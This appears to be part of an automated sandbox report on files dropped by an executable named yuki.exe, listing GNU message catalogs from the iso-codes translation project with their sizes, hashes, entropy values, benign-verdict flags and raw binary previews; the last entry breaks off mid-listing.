                                                                                                    Preview:................T...9...........p#......q#......}#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$.......$......'$......2$......:$......B$......M$......V$......^$......f$......m$......s$......{$.. ....$.......$.......$.. ....$.......$.......%.......%.......%......!%......@%......W%......i%......r%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&....../&..,...K&......x&.......&..%....&.......&.......&.......&.......&.......&.......&.......&.......&.......&..%....'..,...-'.."...Z'..*...}'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......%(......-(......6(......?(......[(..'...i(..$....(.......(.......(.......(.......)......))......G)......L)......T)......[)......i)......z).......).......).......).......).......).......).......).......).......).......).......*.......*.......*......#*......(*......2*......;*......B*......P*......W*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\322\260\320\273\321\213\320\261\321\200\320\270\321\202\320\260\320\275\320\270\321\217\320\275\321\213\322\243 \320\220\320\275\321\202\320\260\321\200\320\272\321\202\320\270\320\264\320\260 \320\220\320\271\320\274\320\260\322\223\321\213'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3237
                                                                                                    Entropy (8bit):5.5686202720476015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADEk7hvGqIfdvqNuoUGYrlJhF2xPcMNpcv+eyxPEf1C8jWoo:qDEk7hyBoDY32cMNpc2emMffS
                                                                                                    MD5:2A6839F868888BB497E761790241897B
                                                                                                    SHA1:D0D552650EFD2C95E4332E8A6F906D8783B3B8F7
                                                                                                    SHA-256:5B96DFD3641AE4FB33F40590478E10171D4100E0B68738200A4DF7773D12F19B
                                                                                                    SHA-512:1B53C2E6DF4C9D710B8D646A70A1AA00249124017612FB24DB468C59403D1FEAFAFF2598E125FDDF23CB1AB0B6D05693DAFC105D673F0B9ECAAFC8B4D64DC950
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................>...1...K...p...........7.......^...........i... ...x...........$.......).......2.......D...1...5...v...................:...........#...&...A...N...h...$.......(...............!.......?...4...Q...t...2.......B...........<...I...R................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-1
                                                                                                    Category:dropped
                                                                                                    Size (bytes):530
                                                                                                    Entropy (8bit):5.299511447747916
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:i4rxxLtt02UkcVt//xtLLnk/4FOEb/SXmBQWiOWRl:R1jt0Uyvk/TEbKXmGRl
                                                                                                    MD5:5402B30B62EBEFBA247088E1A8F91472
                                                                                                    SHA1:729F83B85FE69AA4662F1364C87340A327B69CD4
                                                                                                    SHA-256:93CD425D7E30EBACC6616D9E2C6FF90BFEC7F03AEA83CFB14A77930ED2BCA5FE
                                                                                                    SHA-512:F80256D9D444F3DEA9FD6A0801DAAA9753C2B2008E64C7CC1EF7246EC6D5F518C1416B9CAFC7D94E6D85416E11940FF4989B546EFB4E064F44CF941A355ECA3F
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8.......9................Project-Id-Version: iso_3166-1.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2017-12-29 05:38+0000.Last-Translator: Chris Leonard <cjlhomeaddress@gmail.com>.Language-Team: Greenlandic <https://hosted.weblate.org/projects/iso-codes/iso-3166-1/kl/>.Language: kl.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 2.19-dev..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\341\236\242\341\236\266\341\236\240\341\237\222\341\236\234\341\236\240\341\237\222\341\236\200\341\236\266\341\236\223\341\236\270\341\236\237\341\237\222\341\236\220\341\236\266\341\236\223'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):36282
                                                                                                    Entropy (8bit):4.9817191638876555
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:0oQ/ic+48fmsWP48WAIs9EyPzLqFXtacXIxxdWHqG1EMGG1lkJinSJBX9LcvpBF6:bWic+488T4ggyn
                                                                                                    MD5:544D9FB5397E4ABDF2B9B19267FF28CF
                                                                                                    SHA1:42C0F855F527927F0EAF7803662899A5C557B0F9
                                                                                                    SHA-256:DC54C2F1167A7388CDD6727FD8C69CE56719F521CBE37373BBA835C8545CA2B8
                                                                                                    SHA-512:615C090D55903893B9387D1EC9C1C3931F2820C475F15D03C90AD36E1990E5B2810A2C5251239EE4D6489875D1D1285FD16DEA21B8DF9E5B75A138D3A65F3320
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-2
                                                                                                    Category:dropped
                                                                                                    Size (bytes):372
                                                                                                    Entropy (8bit):5.169755126273227
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijn1YYxAgCt0vOuvP0NXzffGGXkk/RcximC3XAF5ITGxWWXmBQ8KMW0YEi9:i4n1xx8t02Ukx/iximCg5ITqvXmBQWi9
                                                                                                    MD5:DEE28A905BEE520A3F5B85A35C735C70
                                                                                                    SHA1:03CE84CB8FE57B6522396CE0525AB5C9D1F69829
                                                                                                    SHA-256:69130EDB914BBAE26C5DCFD7DB5574F41F55DC2B5DB3E9C6EE407C971DDA2606
                                                                                                    SHA-512:EFD97C371EA879CFB2EEA14903DC76BFF8027902322C8D0C381E6F65466D9FF4517B056DFF9BBBB5A327C7148A622B338897ECA8BCE6A9BDDE61675C33A44F3C
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...:...9................Project-Id-Version: iso_3166-2.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: YEAR-MO-DA HO:MI+ZONE.Last-Translator: Automatically generated.Language-Team: none.Language: km.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 '\341\236\242\341\236\266\341\236\216\341\236\266\341\236\205\341\236\200\341\237\222\341\236\232\342\200\213\342\200\213\342\200\213\342\200\213\341\236\242\341\236\204\341\237\213\341\236\217\341\236\266\341\236\200\341\236\221\341\236\267\341\236\205 \341\236\205\341\236\200\341\237\222\341\236\232\341\236\227\341\236\226\342\200\213\341\236\242\341\236\204\341\237\213\341\236\202\341\237\222\341\236\233\341\237\201\341\236\237'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4069
                                                                                                    Entropy (8bit):5.255870086715308
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:qDmD9yBoDl4TCTnioJ/5Sx0VLtfB3GhHSQXHRnThah4X0VXle0VX6h9:qDmDnRhh5SGLxB3GhHS+vdYXlLXi
                                                                                                    MD5:7D1F66E5E9E77CC927008E4B7671CFFE
                                                                                                    SHA1:4FB49E0AABEB5FC314BFD2444F1DC72F51511C83
                                                                                                    SHA-256:62494850B2D4DF8A5FE0325E51416CFE627E804D95FF8DBE399B35A72BABFBDE
                                                                                                    SHA-512:450FC909445BA34DB2B7C998CE1EE9C8BD0E8D8053373C28238AEB01B2326EDF7F1A4662B58D9A023EF895B9543647916BD2B770820AFAC4FE2276DAF3B9D747
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...................m...9...0.......t.......I...M...l...............3.......'...Q...=...y...U.......................C...$...!...h...!.......-.......*.......'.......i...-...9.......C...............6...%...~...\...V.......R...2.......................'...4............................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 58 messages, Project-Id-Version: iso_4217 '\341\236\242\341\236\266\341\236\240\341\237\222\341\236\234\341\236\240\341\237\222\341\236\202\341\236\266\341\236\223\341\236\270'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5396
                                                                                                    Entropy (8bit):5.009235110209708
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:kfZtF9P8PSWgdmnhsd80qTnHjmwW6S78T6V9JLp1qTFf9LywdHvLg:kh9P8LgdR80QnHaf78T6V9JvsV8wdHDg
                                                                                                    MD5:9D390676C26CBFA432D1919CD52053A8
                                                                                                    SHA1:953B24D77CCA3BA75E0D6E6C8089F4B3730A9125
                                                                                                    SHA-256:C7A67DB990D0706081A55CC35E2C6F0776F56D9EB98A5AB132ED5B6B140D2DDB
                                                                                                    SHA-512:6D591B2E5F464F325D22DDF8D221F62F8C36071FC0517BD448B3D322B4C55CBC713B14FC7DF754813C3407A89DC5ABE5E88B80935CCF27B7C19ADC1A45822C78
                                                                                                    Malicious:false
                                                                                                    Preview:........:...........O...................................................-.......;.......M.......^.......n.......}.......................................................................................$.......3.......C.......T.......c.......y.......................................................................................................$.......3.......Q.......c.......v...............................................................................................-.......6.......@.......P...!...,...+...N.......z...".......%.......4.......7...'...+..._...........+......."...................)..."...B...+...e...%.......4.......[.......(...H...1...q...+.......1.......:.......1...<...C...n...+.......................(...<...%...e...7.......(...............4......."...A...1...d...........%.......+.......(.......7.......4...f...4...............1.......7..."...+...Z...........+.......S.......%...5...F...[...+.......O.......[.......g...z...1...........)...........0...........$...1...4.......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 404 messages, Project-Id-Version: ISO-falan-ku 'Efxanistan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21966
                                                                                                    Entropy (8bit):5.074168254199782
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:2NhFQtAqBP6ffNQ1bjA5wsOP4XjOAIbus0DHjn/DroL1z8J/g2:IWAqBPkQ1kmsOP4XjOAIOjn/DroL1m
                                                                                                    MD5:01CDEE3F661F0AFEB544B96FAE67431A
                                                                                                    SHA1:BAE898BFA7C20DF8D0B299FB8CF6F9B08404C5F1
                                                                                                    SHA-256:CC604D6C5D0B50DAA1D5A4C040809F33987E4BF74263DBDD979847FC8A2FFF9A
                                                                                                    SHA-512:4E2C87269D6856E5E5B24FD40D64ECB2CB9469B2E9EFA74D3248CF597EED7767151C028062BCACA63B8C70B6DFB38C5C7F4787922517693330FC54FE7E0C22C6
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$.......$......3$......8$......>$......D$......U$......m$......v$.......$..,....$.......$.......$..%....$.......%.......%......$%......,%......1%......:%......A%......P%......X%..%...g%..,....%.."....%..*....%.......&.......&.......&......"&......5&......Q&......Y&......_&......k&......}&.......&.......&.......&.......&..'....&.......&.......'...... '......?'......]'......b'......j'......q'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......&(.......(......9(......>(......H(......Q(......X(......f(......m(......s(..!....(.......(......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: ISO-falan-ku 'Her\303\252ma \303\216ng\303\256l\303\256z a Antarkt\303\256ka'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2695
                                                                                                    Entropy (8bit):5.2853589398435235
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADC1I/SEMvGqIfdvqNuuAUQI/2GyzCT+DmIYhwIn:qDwI/yyBuA1I/VyGSUwI
                                                                                                    MD5:22865EE12CE1EF1121200EE3268200B8
                                                                                                    SHA1:B60AB439E2CECA9525D7CDF9A403007DD1413B43
                                                                                                    SHA-256:872322A57F3D0D749AB3F52DF8D247071BE9B3DD0E4CB2A5E1A075C78E8DAFA8
                                                                                                    SHA-512:9C6D84B9F82A8B31409F4F517E391C248FAB478A86BFC2A6E870FB7722C3B081B3AB77F07B2923696FB59F04E1785541E33490C54716D8FD845FDD24D51AE48E
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c................... ...y...........%.............../...........'......./.......E.......V.......g...+...........................................................)...$...8.......].......v...................'.......................$...........;.../...I.......y........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6 messages, Project-Id-Version: iso_639-3 'Soran\303\256'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):770
                                                                                                    Entropy (8bit):5.3239100262530785
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iYtQt9lVeilJDu/Xxq7it02UkwVY/rglg2LLFok/4l5NXAvq2bp9vXmBQWiOWr5G:JoBlRUXVt0Ugsbeok/2Xqp9vXmGNG
                                                                                                    MD5:56182E3128B92CBA55D9859CB9738B3A
                                                                                                    SHA1:FAA4598A5C916EA274EC00419B14FDB452E04F9D
                                                                                                    SHA-256:CE56E3974EBA61C99C52F65CB1AAFC9421F71186E3B813F1A3B7745B5C230C6B
                                                                                                    SHA-512:91A9FA8FD8D62C3564A40232DBD97040060FC939B23FE3DD4E83B78FFE0DAC32A0186F316ABBE5BC707FF35287C0E5163BA569C9E565934DA2620030CC0AA295
                                                                                                    Malicious:false
                                                                                                    Preview:................L.......|................................................................................................................................................Central Kurdish.Kurdish.Kurdish, Central.Kurdish, Northern.Northern Kurdish.Project-Id-Version: iso_639-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2022-01-14 11:56+0000.Last-Translator: P..eroja pa.eroj. <cyax1@protonmail.com>.Language-Team: Kurdish (Northern) <https://hosted.weblate.org/projects/iso-codes/iso-639-3/kmr/>.Language: kmr.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.Plural-Forms: nplurals=2; plural=n != 1;.X-Generator: Weblate 4.10.1..Soran..Kurd..Soran..Kurmanc..Kurmanc..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 383 messages, Project-Id-Version: iso_3166-1 '\340\262\205\340\262\253\340\263\215\340\262\227\340\262\276\340\262\250\340\262\277\340\262\270\340\263\215\340\262\245\340\262\276\340\262\250\340\263\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):29606
                                                                                                    Entropy (8bit):5.040583054214674
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:VLxb8NdItDyubsfP4Y2CA0UcXcbCjGHL/LRANQ46Na7rMMJKUl0e2gjnQAjNlE5I:BxANnaGGeGHLTRYQ46Na7rMMJA1Wnbe+
                                                                                                    MD5:772395F941D0BB8012C92162BE5C92CF
                                                                                                    SHA1:B6E180D048123E49F16F7FFF648969D702295224
                                                                                                    SHA-256:4FA76DC8F028943DE64E417E9C5CC4CA3C894809DA8F5EE2B23956875677FED0
                                                                                                    SHA-512:A47F01BEA87E3E733FFDB015DB34537EF636AA40890D4D887A2F3C8A1BE84E93BA9CE4DD339024342105FCD3F88CF8943D2F52A6A7A0FF674885756DE544B3BC
                                                                                                    Malicious:false
                                                                                                    Preview:................................0 ......1 ......= ......E ......M ......\ ......d ......k ......t ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... ....... .......!.......!.......!.......!......&!......-!......3!......;!.. ...B!......c!......k!.......!.......!.......!.......!.......!.......!.......!.......!.......!......."......."......."......."......."......G"......L"......R"......X"......i"......."......."......."..,...."......."......."..%...."...... #......-#......8#......@#......E#......L#......[#..%...j#..,....#.."....#..*....#.......$.......$.......$......%$......8$......T$......\$......b$......n$.......$.......$.......$.......$.......$..'....$.......$.......%......#%......B%......`%......e%......m%......t%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&......)&......1&......<&......A&......K&......T&......[&......i&......p&......v&..!....&.......&.......&.......&..0....&.......'.......'......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):419
                                                                                                    Entropy (8bit):5.254693224946392
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijMYYxA9Ct0vOuvP0NXzff4UaZD/RfQ3e5L2AFr83XmBQ8KMW0YEiR8A:i4Mxxjt02UkxaR/CgLLo3XmBQWiR8A
                                                                                                    MD5:6A47F9E9B378D6CF90E25877EE5A9DA9
                                                                                                    SHA1:0AF79088955270E8B789FF8209748F42826160D7
                                                                                                    SHA-256:A599CEE3F86F89D794EA47FAAA10CDBEBEDF1AC144411AFE434EFDE9397BAE7D
                                                                                                    SHA-512:EFC5C74339EDDE2D3319DBC54F3CFAB2EA74385211DC29D768C9A041C57A749B261F4CA6A1357FAD8911BADCCED30E4106C411782CCA54E783DFC4D0B2931223
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...i...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2007-05-03 14:19+0530.Last-Translator: Vikram Vincent <vincentvikram@gmail.com>.Language-Team: Kannada.Language: kn.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit.X-Generator: KBabel 1.11.4..
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 6480 messages, Project-Id-Version: iso_639-3 '\340\262\205\340\262\260\340\263\200\340\262\257\340\262\260\340\263\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):390349
                                                                                                    Entropy (8bit):5.202929459619201
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6144:TpZWCh26h9dYVN6dtoHPaNJFidyKDSUN+cLlCUTYl/hJwv7MW9ZBhCA/nHlUoriI:TKUfHrMPNlLlCUTYl/hJwv7/9ZBhCA/T
                                                                                                    MD5:DAED8042E7A9AC79D51B17855FD95B00
                                                                                                    SHA1:49E2324CEF05CEF924E69F9AD15FBE9249205AD4
                                                                                                    SHA-256:01808C761F0D8DD6A9530552183CD40999AB2B8C15FAEDF8D6AA36F4D2E98D24
                                                                                                    SHA-512:B01DC93EEE5FD59AC97335CB3D4B350B8172CF151DEAD892E2D9D3F53EC8568624F318ADAAA5EF9A5B72446647D02983170D2111C8CF46E0F9F845CF5A18D2F6
                                                                                                    Malicious:false
                                                                                                    Preview:........P............!.......... .......!.......*.......4.......?.......D.......K.......Q.......].......e.......j.......o.......u.......|...............................................................................................................................................................................%.......4.......=.......L.......R.......Y.......^.......v.......|....................................................................................................................................................................... .......*.......2.......:.......@.......N.......T.......Y......._.......f.......j.......o...............................................................................%.......0.......7.......@.......F.......P.......Z.......a.......f.......n.......s.......z................................................................................................................................ ....... ...... ......& ......, ......C ......F ......J ......R ......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 51 messages, Project-Id-Version: iso_15924 '\354\225\204\353\236\215\354\226\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2668
                                                                                                    Entropy (8bit):5.307428232978575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PwqJS7s1dChVk2nx1BPJKXBlUZaRtj6jAwyjUBPHwWkkGCE:I6S7sPi2QHBPJWBl9fj6j7yjuPHwQGP
                                                                                                    MD5:8211834E9CEAC8E9A0D94C416B09190F
                                                                                                    SHA1:73093BA46D7F633CC57B073417813A0DA860121B
                                                                                                    SHA-256:3644728029743E0B9FD79C4AAD317DF8D70263857E3A50C8B1431D72C5FD7238
                                                                                                    SHA-512:639A3C102BABCEB22068CFD305F5E365777350020E380F403E6519AA17A9A3D19026BEEB02DB4A321500F2F26C539CE66BC20578BAA7550BCAA2CD8EE895C066
                                                                                                    Malicious:false
                                                                                                    Preview:........3...........G...L.......h.......i.......p.......y....................................................................................................................................................................... .......'.......+.......1.......7.......@.......J.......T.......`.......f.......l.......t...................................................................................................%...........................................................................................$...............;.......H.......R.......f.......t.......~.......................................................................................................).......9.......I.......S.......n.......{.......................................................................................................#.......0.......@.......[.......e...........-...3..........."...................................)...............................................................&...........0...........,...%...
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\354\225\204\355\224\204\352\260\200\353\213\210\354\212\244\355\203\204'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):24296
                                                                                                    Entropy (8bit):5.635005016639599
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosf+K3CMmURSm46nbjz5wsWP48WAINiZGOwc7MK04zfCW5yKWSQPY2qD:0ow3CMmoSm48fmsWP48WAIYwc7k4z75D
                                                                                                    MD5:0FE0BFFD52E7E950553996CDC4AACA87
                                                                                                    SHA1:D059D5C8D6FBAA1292744889D1BA3CFB4484E9C6
                                                                                                    SHA-256:B2B7FD296881BF2F0CB32AC9D578FE99A543F193652D3B6BEC2D6825F7B2882A
                                                                                                    SHA-512:7F7AED24FFB81D78689123E8A3C3E06646250C52A205CA3716D298D29E10F99203D8F0DF76DAE93E5761F018E45B94D211A6A930DEE458D56AF6097F029733DB
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 90 messages, Project-Id-Version: iso_3166-2 '\354\225\214\353\235\274\353\260\224\353\247\210\354\226\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4513
                                                                                                    Entropy (8bit):5.34140241148341
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:g7rbRZHs1Dk6urUVmXS4MtyU1pxZaw/f96b4E4hkicovpEuMRNV:4rdZaDk6EXuyU+wy4hkhovpEuMfV
                                                                                                    MD5:0DE39A19AF9CC1FCFDEE8EDA657C138C
                                                                                                    SHA1:0DB027C7B7E9D432754E9B69AAD3AE0B553D7AD6
                                                                                                    SHA-256:3EF798FD8AA692BE32E774F36799E290C122280014E6E87A938F9A9EE243079A
                                                                                                    SHA-512:75483B958F0768AF27B76DDBE53E5E08397433D395293ECED97C5E568C7AAD628BB6EFF2EB34176371A80D5A2055104CA89A6D768736D154606624EAFF268CDE
                                                                                                    Malicious:false
                                                                                                    Preview:........Z...............................................................................................................$.......6.......B.......K.......].......q.......z.......................................................................................................*.......1.......@.......O.......X.......l.......t...............................................................................................................................#.......-.......9.......B.......I.......P.......^.......i.......t.......}...............................................................................................................................0.......5.......<.......B.......L.......R...$...d...............................................................................................................................................................(.......2.......9.......@.......P.......Z.......d.......n.......~...............................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\354\230\201\352\265\255\353\240\271 \353\202\250\352\267\271 \354\247\200\354\227\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2783
                                                                                                    Entropy (8bit):5.888761773324434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3DNGnWm1LM5u+vGqIfdvqN5CoU1t46o74raBTInbSx52R03:rLvDNGnZ+yaCoG46Kun+z2s
                                                                                                    MD5:9F1D9AA5F80FFB91F7CCF19A7E68A499
                                                                                                    SHA1:722D2D6DDF24B98C88FEC7B47407EBB2EB7A74FF
                                                                                                    SHA-256:3642209B806FF687629760DEC35F2E093CA089AE178AC1669E2BEA7814691FC3
                                                                                                    SHA-512:FBAC10C864534852A378D74A23194DC45F4BC0D5A369D8F2AF7FBB1C51A6C308E56B46F6E20E2D18C112E165876685C1739051E3289C998F6AA8C04192FAA660
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................'.......0...........#...,...;.......h.......u...........................%...................................#...#...7.......[.......h...!...............................................*...........:.......Q.......l.......}...0....................... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\354\225\204\355\224\204\353\246\254\354\271\264\352\260\234\353\260\234\354\235\200\355\226\211 \352\263\204\354\240\225 \353\213\250\354\234\204'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):10767
                                                                                                    Entropy (8bit):5.614389128415977
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFGNbeWjNehzQOG7Y6VRyK0G/2LCntxVultpKPH539Gn9JKWFC0mETz2tYEYnbk:SsKqGe7Y6TL0G/Uo/oKPHqJKHiTz2hwo
                                                                                                    MD5:2135BBD942CAE51AF4A662A20F77FEE0
                                                                                                    SHA1:E10F6559FCFDBB973E89D7E52EADAFF0DA556D70
                                                                                                    SHA-256:9926DA537B85320126C5536DFD60F01B3F7AB7E859DBAB6167EC04E3A72759F3
                                                                                                    SHA-512:CEB1796F1CF26A5E1B242793124C69AC8DE3FBC10603C0A486C44AB9EBDD8BB2D1AD21E811950524390FDD3B1D311F8C73C3801720F83A3EEC26E9FDED2F6390
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\Desktop\yuki.exe
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 381 messages, Project-Id-Version: iso_639-3 '\354\225\225\355\225\230\354\212\244\354\226\264'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):18040
                                                                                                    Entropy (8bit):5.358886411171497
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:yBYycQTVT4L0loaFoEdsCj4lKxFMLs7tbQ4/VXEIWA8TGzRkZSVem7:yB3r4I9FjxO4/VXEIAK+AP7
                                                                                                    MD5:98076D5F48EB768BED20FF9A7C3DDD2E
                                                                                                    SHA1:B9F34E91CC5A5BD2D6B102E98078B0FF7D1E052F
                                                                                                    SHA-256:6B22F43555C28E592262EE860394860DB011176547D494D6F0FF3DCCD1127D33
